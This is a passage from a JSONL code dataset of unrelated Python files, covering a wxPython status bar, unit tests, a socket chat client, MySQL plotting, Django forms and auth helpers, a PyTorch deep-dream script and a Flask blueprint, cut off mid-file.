iterations):\n \"\"\"\n wrap fancyimpute-mice\n \"\"\"\n missing_col_id = []\n test_data = mvp.df2np(test_data, missing_col_id, self._verbose)\n if (len(missing_col_id) == 0): return test_data\n complete_data = mice(n_imputations=iterations, verbose=(1 if self._verbose else 0)).complete(test_data)\n return complete_data\n","sub_path":"dsbox/datapreprocessing/cleaner/mice.py","file_name":"mice.py","file_ext":"py","file_size_in_byte":4745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"506895308","text":"from ..base import *\n\n\nclass StatusBar(BasicToolbar):\n\n def __init__(self, parent, pos, width):\n\n back_img = wx.Image(os.path.join(GFX_PATH, \"statusbar_bg.png\"))\n borders = {}\n\n for part in (\"left\", \"right\"):\n path = os.path.join(GFX_PATH, \"statusbar_border_%s.png\" % part)\n borders[part] = wx.Bitmap(path)\n\n center_img = wx.Image(os.path.join(GFX_PATH, \"statusbar_border_center.png\"))\n\n if not center_img.HasAlpha():\n center_img.InitAlpha()\n\n w, h = borders[\"left\"].GetSize()\n margin = 9\n x = 160\n self._mode_text_rect = wx.Rect(margin, 5, x - margin * 2, h - 10)\n self._info_text_rect = wx.Rect(x + margin, 5, width - x - margin * 2, h - 10)\n\n bitmap = back_img.AdjustChannels(1.6, 1.6, 1.6).Scale(width, h).ConvertToBitmap()\n mem_dc = wx.MemoryDC(bitmap)\n mem_dc.DrawBitmap(borders[\"left\"], 0, 0)\n size = (x - 2 * w, h)\n borders[\"center\"] = center_img.Scale(*size).ConvertToBitmap()\n mem_dc.DrawBitmap(borders[\"center\"], w, 0)\n mem_dc.DrawBitmap(borders[\"right\"], x - w, 0)\n mem_dc.DrawBitmap(borders[\"left\"], x, 0)\n size = (width - x - 2 * w, h)\n borders[\"center\"] = center_img.Scale(*size).ConvertToBitmap()\n mem_dc.DrawBitmap(borders[\"center\"], x + w, 0)\n mem_dc.DrawBitmap(borders[\"right\"], width - w, 0)\n mem_dc.SelectObject(wx.NullBitmap)\n\n BasicToolbar.__init__(self, parent, pos, bitmap)\n\n self._mode_text = \"\"\n self._info_text = \"\"\n\n self.Bind(wx.EVT_PAINT, self.__draw)\n\n Mgr.add_app_updater(\"status\", self.__update_status)\n\n def __update_status(self, *status_specs):\n\n data = GlobalData[\"status_data\"][status_specs[0]]\n\n for spec in status_specs[1:]:\n data = data[spec]\n\n mode_text = data[\"mode\"]\n\n if mode_text and mode_text != self._mode_text:\n self.__set_mode_text(mode_text)\n\n info_text = data[\"info\"]\n\n if info_text != self._info_text:\n self.__set_info_text(info_text)\n\n def __draw(self, event):\n\n dc = wx.AutoBufferedPaintDCFactory(self)\n dc.DrawBitmap(self.get_bitmap(), 0, 0)\n dc.SetFont(Fonts.get(\"default\"))\n dc.DrawLabel(self._mode_text, self._mode_text_rect, wx.ALIGN_CENTER_VERTICAL)\n dc.DrawLabel(self._info_text, self._info_text_rect, wx.ALIGN_CENTER_VERTICAL)\n\n def __set_mode_text(self, text):\n\n self._mode_text = text\n self.RefreshRect(self._mode_text_rect)\n\n def __set_info_text(self, text):\n\n self._info_text = text\n self.RefreshRect(self._info_text_rect)\n","sub_path":"src/gui/components/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"54529278","text":"import unittest\nfrom mediawiki_article_sentences_refs import *\n\nCATALAN_DIR = 'test/resources/catalan'\nlog_filenames = (\n '2010_Catalan_autonomy_protest.clean-wikitext.log',\n '2010_Catalan_autonomy_protest.map_reftoken_to_urls.log',\n '2010_Catalan_autonomy_protest.orig-wikitext.log',\n '2010_Catalan_autonomy_protest.sentences.log',\n '2010_Catalan_autonomy_protest.urls.log',\n '2010_Catalan_autonomy_protest.wikitext_with_reftokens.log',\n)\n\nlog_paths = (\n \"{0}/{1}\".format(CATALAN_DIR, fn)\n for fn in log_filenames\n)\n\n\nwith open(log_paths.next()) as f:\n text = f.read().decode('utf-8')\n catln_clean_wikitext = text\n\nwith open(log_paths.next()) as f:\n text = f.read()\n catln_map_reftoken_to_urls = eval(text)\n\nwith open(log_paths.next()) as f:\n text = f.read().decode('utf-8')\n catln_wikitext = text\n\nwith open(log_paths.next()) as f:\n text = f.read().decode('utf-8')\n catln_sentences = text.split('\\n')\n\nwith open(log_paths.next()) as f:\n text = f.read().decode('utf-8')\n catln_urls = [\n urls.split('\\t')\n for urls in text.split('\\n')\n ]\n\nwith open(log_paths.next()) as f:\n text = f.read().decode('utf-8')\n catln_wikitext_with_reftokens = text\n\n\nclass TestCatalan(unittest.TestCase):\n\n def test_clean_wikitext(self):\n expect = catln_clean_wikitext\n actual = clean_wikitext(catln_wikitext)\n self.assertItemsEqual(expect, actual)\n\n def test_map_reftoken_to_urls__map(self):\n expect = catln_map_reftoken_to_urls\n actual, __ = collect_refs(catln_clean_wikitext)\n self.assertItemsEqual(expect, actual)\n\n def test_map_reftoken_to_urls__map(self):\n expect = catln_wikitext_with_reftokens\n __, actual = collect_refs(catln_clean_wikitext)\n self.assertEqual(\n expect,\n actual,\n u\"\\n***expect:***\\n{0}\\n***actual:***\\n{1}\\n\".format(\n expect, actual\n ).encode('utf-8')\n )\n","sub_path":"test/test_catalan.py","file_name":"test_catalan.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"331613","text":"import socket\n\ns = socket.socket()\ns.connect(('192.168.5.124',9001))\n\nwhile True:\n data = input(\">> \").strip()\n if data == \"\":\n continue\n if data == \"q\":\n s.close()\n break\n s.send(bytes(data,encoding=\"utf-8\"))\n data = s.recv(1024)\n print(\"recv:\",data.decode())","sub_path":"day9/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"78881248","text":"import matplotlib.pyplot as plt\nimport MySQLdb as mdb\nfrom matplotlib import colors\n\n\ndef graph():\n # 连接数据库\n conn = mdb.connect(host='127.0.0.1', port=3306, user='root', passwd='root', db='alibaba_trace', charset='utf8')\n\n # 如果使用事务引擎,可以设置自动提交事务,或者在每次操作完成后手动提交事务conn.commit()\n conn.autocommit(1) # conn.autocommit(True)\n\n # 使用cursor()方法获取操作游标\n cursor = conn.cursor()\n # 因该模块底层其实是调用CAPI的,所以,需要先得到当前指向数据库的指针。\n\n try:\n cursor.execute(\"select DISTINCT instance_id from container_usage\")\n records = cursor.fetchall()\n result = list(records)\n print(result)\n\n # 绘图\n fig = plt.figure(figsize=(20, 4))\n ax1 = fig.add_subplot(1, 3, 1)\n ax2 = fig.add_subplot(1, 3, 2)\n ax3 = fig.add_subplot(1, 3, 3)\n ax1.set_title('cpu utilization')\n ax2.set_title('memory utilization')\n ax3.set_title('disk utilization')\n ax1.set_xlabel(\"time(hour)\")\n ax2.set_xlabel(\"time(hour)\")\n ax3.set_xlabel(\"time(hour)\")\n ax1.set_ylabel('instance id')\n norm = colors.Normalize(vmin=0, vmax=50)\n\n res = []\n res[:] = map(list, result)\n instance_ids = [x[0] for x in res]\n instance_ids = sorted(instance_ids)\n ax1.set_xlim(0, 12)\n ax2.set_xlim(0, 12)\n ax3.set_xlim(0, 12)\n ax1.set_ylim(0, max(instance_ids))\n ax2.set_ylim(0, max(instance_ids))\n ax3.set_ylim(0, max(instance_ids))\n for i in instance_ids:\n # if i > 10000 and i <= 12000:\n # if i <= 2000:\n print(i)\n cursor.execute(\n \"select instance_id, ts, cpu_util, mem_util, disk_util from container_usage where instance_id = (%d)\" % (\n i))\n result = cursor.fetchall()\n result = list(result)\n res[:] = map(list, result)\n instance_id = [x[0] for x in res]\n time_stamp = [x[1] for x in res]\n cpu_util = [x[2] for x in res]\n # print(cpu_util)\n mem_util = [x[3] for x in res]\n # print(mem_util)\n disk_util = [x[4] for x in res]\n # print(disk_util)\n timestamp = [(x / 3600 - 11) for x in time_stamp]\n timestamp = sorted(timestamp)\n # ax1.plot(timestamp, cpu_util)\n # ax2.plot(timestamp, mem_util)\n # ax3.plot(timestamp, disk_util)\n ax1.scatter(timestamp, instance_id, c=cpu_util, norm=norm, alpha=0.5, s=0.1)\n ax2.scatter(timestamp, instance_id, c=mem_util, norm=norm, alpha=0.5, s=0.1)\n ax3.scatter(timestamp, instance_id, c=disk_util, norm=norm, alpha=0.5, s=0.1)\n # 绘制渐变色标注\n gci = plt.scatter(timestamp, instance_id, c=cpu_util, norm=norm, alpha=0.5, s=0.001)\n cbar = plt.colorbar(gci)\n cbar.set_label('used')\n plt.savefig('../imgs_mysql/container_usage.png')\n plt.show()\n except:\n import traceback\n traceback.print_exc()\n # 发生错误时回滚\n conn.rollback()\n finally:\n # 关闭游标连接\n cursor.close()\n # 关闭数据库连接\n conn.close()\n\nif __name__ == '__main__':\n graph()\n","sub_path":"mysql_analysis/batch_job/machine_instance_number.py","file_name":"machine_instance_number.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"230537563","text":"#Given a sorted array, two integers k and x, find the k closest elements to x in the array. The result should also be sorted in ascending order. If there is a tie, the smaller elements are always preferred.\n\n#Example 1:\n#Input: [1,2,3,4,5], k=4, x=3\n#Output: [1,2,3,4]\n#Example 2:\n#Input: [1,2,3,4,5], k=4, x=-1\n#Output: [1,2,3,4]\n#Note:\n#The value k is positive and will always be smaller than the length of the sorted array.\n#Length of the given array is positive and will not exceed 104\n#Absolute value of elements in the array and x will not exceed 104\n\nimport heapq\n\nclass Solution(object):\n def findClosestElements(self, arr, k, x):\n \"\"\"\n :type arr: List[int]\n :type k: int\n :type x: int\n :rtype: List[int]\n \"\"\"\n \"\"\"\n if arr == []:\n return []\n if x not in arr:\n return arr[:k+1]\n left = 0\n right = len(arr) - k\n while left < right:\n mid = (left + right) // 2\n if x - arr[mid] > arr[mid+k] - x:\n left = mid + 1\n else:\n right = mid\n return arr[left:left+k]\n \"\"\"\n m = len(arr)\n sub = [((arr[i]-x)**2, i) for i in range(m)]\n heapq.heapify(sub)\n return sorted([arr[heapq.heappop(sub)[1]] for i in range(k)])","sub_path":"python_code/658_Find_K_Closest_Elements.py","file_name":"658_Find_K_Closest_Elements.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"45493514","text":"from tests.views.message.utils import post_and_get_response\n\n\ndef test_message_nested_sync_input(client):\n data = {\"dictionary\": {\"name\": \"test\"}}\n action_queue = [\n {\"payload\": {\"name\": \"dictionary.name\", \"value\": \"test1\"}, \"type\": \"syncInput\",}\n ]\n response = post_and_get_response(\n client,\n url=\"/message/tests.views.fake_components.FakeComponent\",\n data=data,\n action_queue=action_queue,\n )\n\n assert not response[\"errors\"]\n assert response[\"data\"].get(\"dictionary\") == {\"name\": \"test1\"}\n","sub_path":"tests/views/message/test_sync_input.py","file_name":"test_sync_input.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"462752434","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Date : 2018-12-16 21:07:57\r\n# @Author : emmmmm\r\n\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom datetime import datetime\r\n\r\n\r\ndef hour_Hz(file_path):\r\n datals = []\r\n date_h = []\r\n hour_count = {}\r\n\r\n f = open(file_path) # 对xx文本的分析\r\n for i in f:\r\n datals.append(i.split(\",\")) # 文本格式分割形成列表\r\n f.close()\r\n\r\n dateall = datals[0] # datals[0]表示所有date的集合\r\n # print(len(dateall))\r\n for i in range(len(dateall)):\r\n date_h.append((dateall[i][11:13])) # 取时间hour部分 ps.date_h是所有小时的集合\r\n # print(date_h)\r\n\r\n for key in date_h:\r\n hour_count[key] = hour_count.get(key, 0) + 1\r\n # print (hour_count)\r\n return hour_count\r\n\r\ndef hour_Hz_plot(file_path):\r\n hour_sort=[]\r\n h_key_sort = []\r\n\r\n hour_H = hour_Hz(file_path) #得到时间分析数据,各时间的出现频率\r\n h_key = list(hour_H.keys())\r\n ind = np.arange(len(h_key)) # 图表的x轴间隔\r\n # 整理数据\r\n for i in range(len(h_key)):\r\n index = str(i) if i>9 else '0' + str(i)\r\n hour_sort.append(hour_H[index]) # 整理散乱顺序数据为00-23顺序\r\n h_key_sort.append(i) # 绘图时x轴刻度\r\n\r\n # 绘图\r\n fig=plt.figure()\r\n ax = fig.add_subplot(1,1,1)\r\n rects1 = ax.plot(ind, hour_sort, 'r-', marker='o') # 设置图表参数\r\n plt.xticks(np.arange(len(h_key)), h_key_sort) # 画x轴标签\r\n # plt.show()\r\n\r\ndef weekday_2_box(file_path):\r\n datals = []\r\n date_weekday = []\r\n weekday_count = {}\r\n f = open(file_path)\r\n for i in f:\r\n datals.append(i.split(\",\"))\r\n f.close()\r\n\r\n dateall = datals[0]\r\n # print(len(dateall))\r\n for i in range(len(dateall)):\r\n weekday = datetime.strptime((dateall[i][0:10]),\"%Y-%M-%d\").weekday()+1\r\n date_weekday.append(weekday)\r\n all_weekday = date_weekday\r\n # print(all_weekday)\r\n fig,ax = plt.subplots(figsize=(5,3))\r\n plt.boxplot(all_weekday)\r\n plt.title('weekday boxplot')\r\n plt.setp(ax,xticklabels=['weekday'])\r\n plt.grid(True)\r\n # plt.show()\r\n\r\ndef main(file_path):\r\n weekday_2_box(file_path)\r\n hour_Hz_plot(file_path)\r\n plt.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n # commits-test.txt 为测试文本\r\n main(\"commits-test.txt\") # 在这里修改成要分析的文本就好,格式:xxx.txt\r\n\r\n\r\n\r\n","sub_path":"article_code/Github-commit-analysis.py","file_name":"Github-commit-analysis.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"18381085","text":"from django import forms\nfrom .models import *\n\nclass RequisicaoForm(forms.ModelForm):\n class Meta:\n model = Cadastro_Requisicao\n fields = '__all__'\n\n\nclass ItemForm(forms.ModelForm):\n class Meta:\n model = Item_requisicao\n fields = '__all__'\n\n def __init__(self, *args, **kwargs ): \n self.id_form = kwargs.pop('id_form')\n self.disable_serie = kwargs.pop('disable_serie')\n self.disable_descricao = kwargs.pop('disable_descricao') \n super(ItemForm, self).__init__(*args, **kwargs) \n\n self.fields['Requisicao'].disabled = True \n self.fields['Requisicao'].initial = self.id_form\n self.fields['Numero_serie'].disabled = self.disable_serie\n self.fields['Descricao'].disabled = self.disable_descricao\n","sub_path":"requisicao/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"220003602","text":"# -*- coding: utf-8 -*-\r\nimport inspect\r\n\r\nimport re\r\nfrom django.conf import settings\r\nfrom django.core.exceptions import ImproperlyConfigured, PermissionDenied\r\nfrom djsqla.contrib.auth.backends import SQLAlchemyUserBackend\r\nfrom djsqla.contrib.auth.utils import load_backend\r\n\r\nfrom auth.signals import user_login_failed\r\n\r\n\r\ndef _get_backends(return_tuples=False):\r\n backends = []\r\n for backend_path in settings.AUTHENTICATION_BACKENDS:\r\n backend = load_backend(backend_path)\r\n backends.append((backend, backend_path) if return_tuples else backend)\r\n if not backends:\r\n raise ImproperlyConfigured(\r\n 'No authentication backends have been defined. Does '\r\n 'AUTHENTICATION_BACKENDS contain anything?'\r\n )\r\n return backends\r\n\r\n\r\ndef _clean_credentials(credentials):\r\n \"\"\"\r\n Cleans a dictionary of credentials of potentially sensitive info before\r\n sending to less secure functions.\r\n Not comprehensive - intended for user_login_failed signal\r\n \"\"\"\r\n SENSITIVE_CREDENTIALS = re.compile('api|token|key|secret|password|signature', re.I)\r\n CLEANSED_SUBSTITUTE = '********************'\r\n for key in credentials:\r\n if SENSITIVE_CREDENTIALS.search(key):\r\n credentials[key] = CLEANSED_SUBSTITUTE\r\n return credentials\r\n\r\n\r\ndef authenticate(djsqla_sessions, **credentials):\r\n \"\"\"\r\n If the given credentials are valid, return a User object.\r\n \"\"\"\r\n for backend, backend_path in _get_backends(return_tuples=True):\r\n # assert False, backend\r\n try:\r\n inspect.getcallargs(backend.authenticate, **credentials)\r\n except TypeError:\r\n # This backend doesn't accept these credentials as arguments. Try the next one.\r\n continue\r\n\r\n if isinstance(backend, SQLAlchemyUserBackend):\r\n backend_db = backend.get_db_name()\r\n if hasattr(djsqla_sessions, backend_db):\r\n session = getattr(djsqla_sessions, backend_db)\r\n setattr(backend, \"djsqla_session\", session)\r\n\r\n try:\r\n user = backend.authenticate(**credentials)\r\n except PermissionDenied:\r\n # This backend says to stop in our tracks - this user should not be allowed in at all.\r\n return None\r\n if user is None:\r\n continue\r\n # Annotate the user object with the path of the backend.\r\n user.backend = backend_path\r\n return user\r\n\r\n # The credentials supplied are invalid to all backends, fire signal\r\n user_login_failed.send(sender=__name__, credentials=_clean_credentials(credentials))","sub_path":"djsqla/contrib/auth/authenticate.py","file_name":"authenticate.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"59402843","text":"import sys\r\nsys.path.append(\"../\")\r\nimport os\r\nimport time\r\nimport random\r\nimport math\r\nimport scipy\r\nimport torch\r\nimport torch.nn as nn\r\nfrom torch.autograd import Variable\r\nfrom torchvision import models\r\nfrom torchvision import transforms, utils\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image, ImageFilter, ImageChops\r\nfrom torch.nn import functional as F\r\n\r\nfrom dict_network.dict_net import *\r\n#from deep_dream_mnist.network_mnist import *\r\n\r\ndef create_random_image(image_dim,img_is2D,random_seed=0):\r\n '''Creates a random image of of shape given by image_dim which should be a tuple of length 3 HxWxC '''\r\n np.random.seed(random_seed)\r\n rand_image_np = np.random.random(image_dim)*255\r\n \r\n if img_is2D:\r\n rand_image = Image.fromarray((rand_image_np)[:,:,0].astype('uint8'),'L')\r\n else:\r\n rand_image = Image.fromarray((rand_image_np).astype('uint8'),'RGB')\r\n\r\n return rand_image\r\n \r\ndef preprocess_image(input_image,mean,std):\r\n '''Converts a PIL image to tensor and normalizes according to the mean and std provided,\r\n both of which should be tuples of length 3'''\r\n preprocess = transforms.Compose([\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean,std),\r\n ])\r\n\r\n return preprocess(input_image)\r\n \r\ndef postprocess_batch(image_tensor,mean,std,img_is2D,device):\r\n '''Multiplies and then adds channelwise the tensor with the std and mean tuples respectively. In short, does the \r\n inverse of the normalizing function in preprocess'''\r\n #image_dim = image_tensor.shape\r\n \r\n if img_is2D:\r\n image_tensor = image_tensor*std[0] + mean[0]\r\n else:\r\n std_tensor = torch.Tensor(list(std)).view(1,3,1,1).to(device)\r\n mean_tensor = torch.Tensor(list(mean)).view(1,3,1,1).to(device)\r\n\r\n image_tensor = image_tensor * std_tensor + mean_tensor\r\n\r\n return image_tensor\r\n \r\ndef dream(network,labels,image_dim,mean,std,nItr=100,lr=0.1,random_seed=0,kernel_size=3,sigma=0.5,loss_type='logit'):\r\n '''Given a trained convolutional network and a list of desired label numbers,\r\n function returns a batch of images (BxCxHxW) that has been optimized to output high confidence\r\n for that the specified labels when forward passed through the network\r\n image_dim : tuple with length 2 or 3 for 2D or 3D image to be produced. HxWxC Example (224,224,3) or (32,128,1)\r\n mean : tuple of length 3 with mean pixel value. Example (0.5,0.5,0.5) for 3D, (0.5,) for 2D\r\n mean : tuple of length 3 with standard deviation of pixel values. 
Example (0.5,0.5,0.5) for 3D, (0.5,) for 2D\r\n '''\r\n network.eval()\r\n img_is2D = check_if2D(image_dim)\r\n gaussian_filter = GaussianFilter(img_is2D,kernel_size,sigma)\r\n \r\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n network,gaussian_filter = move_network_to_device(network,gaussian_filter,device)\r\n \r\n image_tensor = dream_kernel(network,gaussian_filter,image_dim,labels,mean,std,nItr,lr,random_seed,device,loss_type)\r\n\r\n return image_tensor\r\n\r\ndef dream_kernel(network,gaussian_filter,image_dim,labels,mean,std,nItr,lr,random_seed,device,loss_type):\r\n '''Creates a batch of random images and optimizes it to output high confidence for the specified labels'''\r\n img_is2D = check_if2D(image_dim)\r\n for i in range(len(labels)):\r\n im = create_random_image(image_dim,img_is2D,random_seed)\r\n im = preprocess_image(im,mean,std)\r\n if i== 0:\r\n img = im.unsqueeze(0)\r\n else:\r\n img = torch.cat((img,im.unsqueeze(0)),0)\r\n \r\n img = move_img_to_device(img,device)\r\n img = Variable(img,requires_grad=True)\r\n \r\n for _ in range(nItr):\r\n #start = time.time()\r\n out = network(img)\r\n #end = time.time()\r\n #print(\"Time for forward pass \",end-start)\r\n \r\n loss = 0\r\n if loss_type == \"logit\":\r\n for index,label in enumerate(labels):\r\n loss += out[index,label]\r\n \r\n if loss_type == \"softmax\":\r\n for index,label in enumerate(labels):\r\n loss += F.softmax(out,dim=1)[index,label]\r\n\r\n if loss_type == \"log_softmax\":\r\n for index,label in enumerate(labels):\r\n loss += torch.log(F.softmax(out,dim=1)[index,label])\r\n\r\n #start = time.time()\r\n loss.backward()\r\n #end = time.time()\r\n #print(\"Time for backprop \",end-start)\r\n\r\n\r\n #start = time.time()\r\n avg_grad = torch.mean(torch.abs(img.grad.data)).item()\r\n norm_lr = lr / (avg_grad + 1e-20)\r\n img.data += norm_lr * img.grad.data\r\n img.data = torch.clamp(img.data,-1,1)\r\n #end = time.time()\r\n #print(\"Time for update \",end-start)\r\n\r\n\r\n #start = time.time()\r\n img.data = gaussian_filter(img.data)\r\n #end = time.time()\r\n #print(\"Time for regularization\",end-start)\r\n\r\n\r\n img.grad.data.zero_()\r\n img = postprocess_batch(img,mean,std,img_is2D,device)\r\n \r\n return img\r\n\r\ndef move_network_to_device(network,gaussian_filter,device):\r\n '''moves network and gaussian filter to gpu,if available'''\r\n network.to(device)\r\n gaussian_filter.gaussian_filter.to(device)\r\n\r\n return network,gaussian_filter\r\n\r\ndef move_img_to_device(img,device):\r\n '''moves an image tensor to gpu,if available'''\r\n img = img.to(device)\r\n\r\n return img\r\n\r\ndef check_if2D(image_dim):\r\n '''Given a image shape returns a bool whether the image is 2D or 3D. 
Input tuple should be of the form HxWxC'''\r\n if image_dim[-1] == 1:\r\n img_is2D = True\r\n elif image_dim[-1] == 3:\r\n img_is2D = False\r\n else:\r\n print(\"image dimension not correct\")\r\n return\r\n return img_is2D\r\n \r\ndef display_grid(batch_tensor):\r\n batch_tensor = batch_tensor.detach()\r\n grid_img = utils.make_grid(batch_tensor, nrow=4)\r\n plt.imshow(grid_img.permute(1, 2, 0))\r\n\r\ndef save_image(batch_tensor,file_name=\"dreams.png\"):\r\n batch_tensor = batch_tensor.detach()\r\n utils.save_image(batch_tensor,file_name,nrow=4)\r\n \r\nclass GaussianFilter:\r\n '''Creates a gaussian filter with given kernel size and sigma values.\r\n This filter is used to apply gaussian filter on an input image(2D or 3D\r\n depending on the variable input_img_is2D) through convolution'''\r\n def __init__(self,input_img_is2D=True,kernel_size=3,sigma=0.5):\r\n \r\n x_cord = torch.arange(kernel_size)\r\n x_grid = x_cord.repeat(kernel_size).view(kernel_size, kernel_size)\r\n y_grid = x_grid.t()\r\n xy_grid = torch.stack([x_grid, y_grid], dim=-1)\r\n xy_grid = xy_grid.float()\r\n\r\n mean = (kernel_size - 1)/2.\r\n variance = sigma**2.\r\n gaussian_kernel = (1./(2.*math.pi*variance)) * torch.exp(-torch.sum((xy_grid - mean)**2., dim=-1) /(2*variance))\r\n gaussian_kernel = gaussian_kernel / torch.sum(gaussian_kernel)\r\n \r\n gaussian_kernel = gaussian_kernel.view(1, 1, kernel_size, kernel_size)\r\n pad = math.floor(kernel_size/2)\r\n \r\n if input_img_is2D:\r\n self.gaussian_filter = nn.Conv2d(in_channels=1,out_channels=1,padding=pad,kernel_size=kernel_size, groups=1,bias=False)\r\n \r\n else: # input image is 3D\r\n gaussian_kernel = gaussian_kernel.repeat(3, 1, 1, 1)\r\n self.gaussian_filter = nn.Conv2d(in_channels=3,out_channels=3,padding=pad,kernel_size=kernel_size, groups=3,bias=False)\r\n \r\n self.gaussian_filter.weight.data = gaussian_kernel\r\n self.gaussian_filter.weight.requires_grad = False \r\n \r\n def __call__(self,input_tensor):\r\n return self.gaussian_filter(input_tensor)\r\n \r\ndef main():\r\n # create deep dream images with DictNet\r\n network = DictNet(1000)\r\n network.load_state_dict(torch.load(\"../code/train_dict_network/out_3_1000/model_best.pth.tar\")['state_dict'])\r\n output_batch = dream(network,[80,366],(32,128,1),(0.47,),(0.14,))\r\n #display_grid(output_batch)\r\n save_image(output_batch,\"dreams_mjsynth.png\")\r\n \r\n # create deep dream images with MNIST\r\n network = Net()\r\n network.load_state_dict(torch.load('../deep_dream_mnist/mnist.pth'))\r\n output_batch = dream(network,[3,4],(28,28,1),(0.13,),(0.31,))\r\n #display_grid(output_batch)\r\n save_image(output_batch,\"dreams_MNIST.png\")\r\n \r\n # create deep dream images with ImageNet\r\n network = models.vgg19(pretrained=True)\r\n output_batch = dream(network,[79,736],(224,224,3),(0.485, 0.456, 0.406),(0.229, 0.224, 0.225),nItr=400)\r\n #display_grid(output_batch)\r\n save_image(output_batch,\"dreams_ImageNet.png\")\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"library/create_dream.py","file_name":"create_dream.py","file_ext":"py","file_size_in_byte":8725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"281124092","text":"# -*- coding:utf-8 -*-\nimport json\nfrom scholarnet import Scholarnet\n\n# ログインデータの読み込み\nwith open(\"profile.json\", 'r') as f:\n profile = json.load(f)\n\n# 更新情報の取得\nscholar = Scholarnet()\nhtml_top, html_univ = scholar.get_pages(profile)\nnext_date, updated_date = scholar.get_dates(html_top)\n\n# 返還データの取得\ncontents = scholar.get_contents(html_univ, profile[\"type\"])\n\n# 結果の表示\nprint(\"今回の更新日: %s\" % updated_date)\nprint(\"次回の更新日: %s\" % next_date)\nfor k,v in contents.items():\n print(\"%s: %s\" % (k,v))\n\n# データの保存\nwith open(\"contents_%s.json\" % updated_date, 'w') as f:\n json.dump(contents,f,ensure_ascii=False,indent=2)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"188798906","text":"import json\n\nfrom flask import Blueprint, current_app,\\\n Response, request, session\n\nfrom organization import admin_permission, db\nfrom organization.common.constants import CREATED, ERROR, JSON_HEADER, MSG, OK\nfrom organization.common.cors import crossdomain\nfrom organization.role.constants import GUEST_ROLE\n\nfrom .constants import APP_NAME\nfrom .models import Article\n\narticle_module = Blueprint(APP_NAME, __name__)\n\n\n@article_module.route(\"/articles/\", methods=[\"GET\"])\ndef index():\n articles = Article.objects.get()\n total_articles = len(articles)\n resp = Response(json.dumps({\"article_count\": total_articles}),\n status=OK,\n content_type=JSON_HEADER)\n return resp\n\n\n@article_module.route(\"/articles/\", methods=[\"POST\"])\ndef create():\n try:\n data = request.json\n article = Article(title=data['title'], words=data['words'],\n body=data['body'])\n article.save()\n resp = Response(json.dumps({MSG: \"Created\"}),\n status=CREATED,\n content_type=JSON_HEADER)\n except Exception as e:\n msg = \"Got error {error} while trying to save\".format(error=e.message)\n resp = Response(json.dumps({MSG: msg}),\n status=ERROR,\n content_type=JSON_HEADER)\n return resp\n","sub_path":"organization/article/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"614841999","text":"import json\r\nimport uuid\r\nimport os\r\nimport logging\r\nimport re\r\nimport base64\r\nfrom typing import Dict, Type, Callable, Union, Any, List, Iterable\r\nfrom datetime import datetime, date\r\nfrom urllib.parse import quote\r\nimport requests\r\nfrom traceback import print_exc\r\n\r\nfrom Crypto.Cipher import AES\r\nfrom CTUtil.types import DateSec\r\nfrom itsdangerous import TimedJSONWebSignatureSerializer as Serializer\r\nfrom django.conf.urls import RegexURLPattern\r\nimport random\r\n\r\ntry:\r\n from aliyunsdkcore.client import AcsClient\r\n from aliyunsdkcore.profile import region_provider\r\n from aliyunsdkdysmsapi.request.v20170525 import SendSmsRequest\r\nexcept:\r\n print_exc()\r\n\r\n\r\nlogger = logging.getLogger()\r\nlogger.setLevel(logging.ERROR)\r\nlogger_formatter = logging.Formatter(\r\n \"%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s\")\r\n\r\n\r\ndef queryset_paging(queryset: Iterable[Any], page: int, page_size: int):\r\n return queryset[(page - 1) * page_size: page * page_size]\r\n\r\n\r\ndef jstimestamp_to_datetime(jstimestamp: int):\r\n return datetime.fromtimestamp(jstimestamp // 1000)\r\n\r\n\r\ndef get_django_all_url(urlpatterns: List[Any]):\r\n urls = []\r\n\r\n def search_url(src_urls: List[Any], root: str, pre_urls: List[str]):\r\n for url in src_urls:\r\n _root = os.path.join(root, url._regex).replace('^', '')\r\n if isinstance(url, RegexURLPattern):\r\n pre_urls.append(_root)\r\n else:\r\n search_url(url.url_patterns, _root, pre_urls)\r\n\r\n search_url(urlpatterns, '/', urls)\r\n return urls\r\n\r\n\r\ndef set_default_file_path(files_dir: str='image',\r\n file_type: str='jpeg') -> str:\r\n _date: Type[date] = datetime.now().date()\r\n dir_path = os.path.join('static', files_dir, format(_date, 